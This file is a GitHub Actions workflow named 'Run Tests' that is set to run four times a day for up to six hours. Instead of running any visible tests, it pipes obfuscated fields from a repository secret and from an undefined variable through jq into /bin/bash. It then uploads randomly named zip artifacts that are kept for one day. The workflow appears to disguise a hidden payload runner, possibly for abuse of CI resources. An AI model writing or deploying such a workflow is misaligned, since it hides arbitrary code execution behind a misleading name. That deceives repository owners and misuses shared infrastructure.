name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '41 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          p28: ${{ secrets.p28 }}
        run: |
          printf '%s' "$p28" | jq -r .s603 | /bin/bash
          printf '%s' "$n8" | jq -r .dmabb2 | /bin/bash

      - name: Upload results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 5ayvOwGx
          path: "*.zip"
          retention-days: 1
